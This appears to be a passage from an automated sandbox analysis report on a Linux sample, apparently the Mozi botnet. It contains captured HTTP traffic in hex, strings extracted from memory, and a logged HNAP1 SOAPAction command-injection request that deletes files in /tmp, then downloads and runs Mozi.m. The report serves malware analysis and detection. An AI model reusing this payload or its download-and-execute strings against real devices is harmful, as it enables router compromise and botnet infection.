Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 16 Nov 2021 14:46:58 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 207Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 73 65 74 75 70 2e 63 67 69 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /setup.cgi was not found on this server.</p></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/7.5X-Powered-By: ASP.NETDate: Tue, 16 Nov 2021 14:47:27 GMTContent-Length: 1245Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 68 31 3e 53 65 72 76
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 16 Nov 2021 14:47:34 GMTServer: Apache/2.2.3 (Debian)Content-Length: 280Keep-Alive: timeout=15, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 73 68 65 6c 6c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 32 2e 33 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 32 30 31 2e 34 39 2e 34 31 2e 37 32 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /shell was not found on this server.</p><hr><address>Apache/2.2.3 (Debian) Server at 201.49.41.72 Port 80</address></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 16 Nov 2021 14:47:34 GMTServer: Apache/2.2.22 (Debian)X-Powered-By: PHP/5.4.45-0+deb7u14Vary: Accept-EncodingContent-Length: 2957Keep-Alive: timeout=15, max=100Connection: Keep-AliveContent-Type: text/htmlX-Pad: avoid browser bugData Raw: 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 49 53 4f 2d 38 38 35 39 2d 31 22 20 2f 3e 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 52 65 71 75 65 73 74 65 64 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 2f 3e 0a 09 68 74 6d 6c 20 7b 0a 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 37 36 25 3b 0a 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 74 61 68 6f 6d 61 2c 76 65 72 64 61 6e 61 2c 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 0a 09 7d 0a 0a 09 62 6f 64 79 20 7b 0a 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 74 61 68 6f 6d 61 2c 76 65 72 64 61 6e 61 2c 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 0a 09 09 6d 61 72 67 69 6e 3a 30 70 78 20 61 75 74 6f 3b 0a 09 09 70 61 64 64 69 6e 67 3a 30 70 78 3b 0a 09 09 70 61 64 64 69 6e 67 2d 74 6f 70 3a 31 30 70 78 3b 0a 09 09 77 69 64 74 68 3a 39 30 30 70 78 3b 0a 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 33 33 33 3b 0a 09 7d 0a 09 61 3a 6c 69 6e 6b 20 7b 0a 09 09 63 6f 6c 6f 72 3a 20 23 31 37 32 43 37 44 3b 0a 09 09 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 09 7d 0a 09 61 3a 76 69 73 69 74 65 64 20 7b 0a 09 09 63 6f 6c 6f 72 3a 20 23 31 37 32 43 37 44 3b 0a 09 09 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 09 7d 0a 09 61 3a 68 6f 76 65 72 20 7b 0a 09 09 63 6f 6c 6f 72 3a 20 23 34 35 37 44 43 39 3b 0a 09 7d 20 20 20 20 20 20 0a 09 69 6d 67 20 7b 0a 09 09 62 6f 72 64 65 72 3a 6e 6f 6e 65 3b 0a 09 7d 0a 09 23 48 65 61 64 65 72 7b 0a 09 09 77 69 64 74 68 3a 20 39 30 30 70 78 3b 0a 09 09 68 65 69 67 68 74 3a 31 30 34 70 78 3b 0a 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 23 42 36 44 37 46 46 3b 0a 09 09 0a 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 75 72 6c 28 22 2f 69 6d 61 67 65 73 2f 68 65 61 64 65 72 2e 6a 70 67 22 29 3b 0a 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 6e 6f 2d 72 65 70 65 61 74 3b 0a 09 09 62
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.15.8Date: Tue, 16 Nov 2021 14:47:41 GMTContent-Type: text/htmlContent-Length: 153Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 35 2e 38 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.15.8</center></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Tue, 16 Nov 2021 14:47:51 GMTContent-Type: text/htmlContent-Length: 1198Connection: closeVary: Accept-EncodingData Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e e7 bd 91 e7 ab 99 e9 98 b2 e7 81 ab e5 a2 99 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 3e 0a 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 3b 63 6f 6c 6f 72 3a 23 34 34 34 7d 0a 62 6f 64 79 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 e5 ae 8b e4 bd 93 22 7d 0a 2e 6d 61 69 6e 7b 77 69 64 74 68 3a 36 30 30 70 78 3b 6d 61 72 67 69 6e 3a 31 30 25 20 61 75 74 6f 3b 7d 0a 2e 74 69 74 6c 65 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 30 61 35 33 61 3b 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 36 70 78 3b 68 65 69 67 68 74 3a 20 34 30 70 78 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 34 30 70 78 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 32 30 70 78 3b 7d 0a 2e 63 6f 6e 74 65 6e 74 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 33 66 37 66 39 3b 20 68 65 69 67 68 74 3a 32 38 30 70 78 3b 62 6f 72 64 65 72 3a 31 70 78 20 64 61 73 68 65 64 20 23 63 36 64 39 62 36 3b 70 61 64 64 69 6e 67 3a 32 30 70 78 7d 0a 2e 74 31 7b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 31 70 78 20 64 61 73 68 65 64 20 23 63 36 64 39 62 36 3b 63 6f 6c 6f 72 3a 20 23 66 66 34 30 30 30 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 20 6d 61 72 67 69 6e 3a 20 30 20 30 20 32 30 70 78 3b 20 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 20 31 38 70 78 3b 7d 0a 2e 74 32 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 38 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 7d 0a 6f 6c 7b 6d 61 72 67 69 6e 3a 30 20 30 20 32 30 70 78 20 32 32 70 78 3b 70 61 64 64 69 6e 67 3a 30 3b 7d 0a 6f 6c 20 6c 69 7b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 33 30 70 78 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 3e 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 61 69 6e 22 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 69 74 6c 65 22 3e e7 bd 91 e7 ab 99 e9 98 b2 e7 81 ab e5 a2 99 3c 2f 64 69 76 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 09 09 09 3c 70 20 63 6c 61 73 73 3d 22 74 31 22 3e e6 82 a8 e7 9a 84 e8 af b7 e6 b1 82 e5 b8 a6 e6 9c 89 e4 b8 8d e5 90 88 e6 b3 95 e5 8f 82 e6 95 b0 ef bc 8c e5 b7 b2 e8 a2 ab e7 bd 91 e7 ab 99 e7 ae a1 e7 90 86 e5 91 98 e8 ae be e7 bd ae e6 8b a6 e6 88 aa ef bc 81 3c 2f 70 3e 0a 09 09 09 3c 70 20 63 6c 61 73 73 3d 22 74 32 22 3e e5 8f af e8 83 bd e5 8e 9f e5 9b a0 ef bc 9a 3c 2f 70 3e 0a 09 09 09 3c 6f 6c 3e 0a 09 09 09 09 3c 6c 69 3e e6 82 a8 e6 8f 90 e4 ba a4 e7 9a 84 e5 86 85 e5 ae b9 e5 8c 85 e5 90 ab e5 8d b1 e9 99 a9 e7 9a 84 e6 94 bb e5 87 bb e8 af b7 e6 b1 82 3c 2f 6c 69 3e 0a 09 09 09 3c 2f 6f 6c 3e 0a 09 09 09 3c 70 20 63 6c 61 73 73
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.16.1Date: Tue, 16 Nov 2021 14:47:51 GMTContent-Type: text/html; charset=UTF-8Content-Length: 42467Connection: closeX-Request-Id: ef485288-6a8c-448a-a0fb-a9632f449634X-Runtime: 0.001219Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 63 2d 53 74 69 63 6b 79 46 6f 6f 74 65 72 20 62 2d 62 72 6f 77 73 65 72 2d 63 68 72 6f 6d 65 22 20 6c 61 6e 67 3d 22 6a 61 22 3e 0a 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 69 65 3d 65 64 67 65 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 78 2d 75 61 2d 63 6f 6d 70 61 74 69 62 6c 65 22 20 2f 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 2d 20 e6 9d b1 e4 ba ac e3 83 ac e3 82 b8 e3 83 87 e3 83 b3 e3 82 b9 e3 83 9e e3 83 bc e3 82 b1 e3 83 83 e3 83 88 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 e4 bd 8f e5 ae 85 e3 83 9e e3 83 8d e3 83 bc e3 82 92 e3 80 8c e7 9f a5 e3 82 8b e3 81 93 e3 81 a8 e3 80 8d e3 81 8b e3 82 89 e3 81 af e3 81 98 e3 82 81 e3 82 88 e3 81 86 ef bc 81 20 e3 81 93 e3 82 8c e3 81 8b e3 82 89 e3 81 ae e6 99 82 e4 bb a3 e3 80 81 e8 b3 87 e7 94 a3 e5 bd a2 e6 88 90 e3 82 84 e9 81 8b e7 94 a8 e3 81 af e3 81 be e3 81 99 e3 81 be e3 81 99 e9 87 8d e8 a6 81 e3 81 a7 e3 81 99 e3 80 82 e3 81 a7 e3 81 af e3 80 81 e4 bd 8f e3 81 be e3 81 84 e3 81 ae e8 b2 bb e7 94 a8 e3 82 84 e4 be a1 e5 80 a4 e3 82 92 e7 9f a5 e3 82 8b e3 81 93 e3 81 a8 e3 81 af e3 81 a9 e3 81 86 e3 81 a7 e3 81 97 e3 82 87 e3 81 86 e3 81 8b e3 80 82 e3 83 9e e3 83 b3 e3 82 b7 e3 83 a7 e3 83 b3 e3 82 92 e8 b2 b7 e3 81 86 e3 81 9e e3 80 81 e5 a3 b2 e3 82 8b e3 81 9e e3 81 a8 e5 8a 9b e3 82 80 e5 89 8d e3 81 ab e3 80 81 e9 95 b7 e3 81 84 e4 ba ba e7 94 9f e3 81 ae e3 80 8c e4 bd 8f e5 ae 85 e3 83 9e e3 83 8d e3 83 bc e3 80 8d e3 82 92 e5 b0 91 e3 81 97 e6 84 8f e8 ad 98 e3 81 99 e3 82 8b e3 81 93 e3 81 a8 e3 81 8b e3 82 89 e3 81 af e3 81 98 e3 82 81 e3 81 be e3 81 9b e3 82 93 e3 81 8b ef bc 9f 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 2c 0a 20 20 20 20 2a 3a 3a 62 65 66 6f 72 65 2c 0a 20 20 20 20 2a 3a 3a 61 66 74 65 72 20 7b 0a 20 20 20 20 20 20 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 74 6d 6c 20 7b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 31 35 3b 0a 20 20 20 20 20 20 2d 77 65 62 6b 69 74 2d 74 65 78 74 2d 73 69 7a 65 2d 61 64 6a 75 73 74 3a 20 31 30 30 25 3b 0a 2
Source: global traffic HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Tue, 16 Nov 2021 14:48:29 GMTContent-Type: application/jsonContent-Length: 45Connection: closex-amzn-RequestId: e7b030a0-f51e-4aba-ba1c-3db988bfe780Data Raw: 55 73 65 72 20 69 73 20 6e 6f 74 20 61 75 74 68 6f 72 69 7a 65 64 20 74 6f 20 70 65 72 66 6f 72 6d 20 74 68 69 73 20 61 63 74 69 6f 6e Data Ascii: User is not authorized to perform this action
Source: bin.sh, 6777.1.00007f1ad31f9000.00007f1ad3203000.rw-.sdmp String found in binary or memory: http://%s:%d/Mozi.a;chmod
Source: bin.sh, 6777.1.00007f1ad31f9000.00007f1ad3203000.rw-.sdmp String found in binary or memory: http://%s:%d/Mozi.a;sh$
Source: bin.sh, 6777.1.00007f1ad31f9000.00007f1ad3203000.rw-.sdmp String found in binary or memory: http://%s:%d/Mozi.m
Source: bin.sh, 6777.1.00007f1ad31f9000.00007f1ad3203000.rw-.sdmp String found in binary or memory: http://%s:%d/Mozi.m;
Source: bin.sh, 6777.1.00007f1ad31f9000.00007f1ad3203000.rw-.sdmp String found in binary or memory: http://%s:%d/Mozi.m;$
Source: bin.sh, 6777.1.00007f1ad31f9000.00007f1ad3203000.rw-.sdmp String found in binary or memory: http://%s:%d/Mozi.m;/tmp/Mozi.m
Source: bin.sh, 6777.1.00007f1ad31b0000.00007f1ad31f1000.r-x.sdmp String found in binary or memory: http://%s:%d/bin.sh
Source: bin.sh, 6777.1.00007f1ad31b0000.00007f1ad31f1000.r-x.sdmp String found in binary or memory: http://%s:%d/bin.sh;chmod
Source: bin.sh, 6777.1.00007f1ad31b0000.00007f1ad31f1000.r-x.sdmp String found in binary or memory: http://127.0.0.1
Source: bin.sh, 6777.1.00007f1ad31b0000.00007f1ad31f1000.r-x.sdmp String found in binary or memory: http://127.0.0.1sendcmd
Source: bin.sh, 6777.1.00007f1ad31b0000.00007f1ad31f1000.r-x.sdmp String found in binary or memory: http://HTTP/1.1
Source: bin.sh, 6777.1.00007f1ad31b0000.00007f1ad31f1000.r-x.sdmp String found in binary or memory: http://baidu.com/%s/%s/%d/%s/%s/%s/%s)
Source: .config.8.dr String found in binary or memory: http://ia.51.la/go1?id=17675125&pu=http%3a%2f%2fv.baidu.com/
Source: bin.sh, 6777.1.00007f1ad31b0000.00007f1ad31f1000.r-x.sdmp String found in binary or memory: http://ipinfo.io/ip
Source: alsa-info.sh0.8.dr String found in binary or memory: http://pastebin.ca)
Source: alsa-info.sh0.8.dr String found in binary or memory: http://pastebin.ca/quiet-paste.php?api=$PASTEBINKEY
Source: alsa-info.sh0.8.dr String found in binary or memory: http://pastebin.ca/quiet-paste.php?api=$PASTEBINKEY&encrypt=t&encryptpw=blahblah
Source: bin.sh, 6777.1.00007f1ad31f9000.00007f1ad3203000.rw-.sdmp String found in binary or memory: http://purenetworks.com/HNAP1/
Source: bin.sh, 6777.1.00007f1ad31f9000.00007f1ad3203000.rw-.sdmp, bin.sh, 6777.1.00007f1ad31b0000.00007f1ad31f1000.r-x.sdmp String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: bin.sh, 6777.1.00007f1ad31f9000.00007f1ad3203000.rw-.sdmp, bin.sh, 6777.1.00007f1ad31b0000.00007f1ad31f1000.r-x.sdmp String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
Source: bin.sh, 6777.1.00007f1ad31f9000.00007f1ad3203000.rw-.sdmp String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope//
Source: alsa-info.sh0.8.dr String found in binary or memory: http://www.alsa-project.org
Source: alsa-info.sh0.8.dr String found in binary or memory: http://www.alsa-project.org.
Source: alsa-info.sh0.8.dr String found in binary or memory: http://www.alsa-project.org/alsa-info.sh
Source: alsa-info.sh0.8.dr String found in binary or memory: http://www.alsa-project.org/cardinfo-db/
Source: alsa-info.sh0.8.dr String found in binary or memory: http://www.pastebin.ca
Source: alsa-info.sh0.8.dr String found in binary or memory: http://www.pastebin.ca.
Source: alsa-info.sh0.8.dr String found in binary or memory: http://www.pastebin.ca/upload.php
Source: unknown HTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 221.128.175.114:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 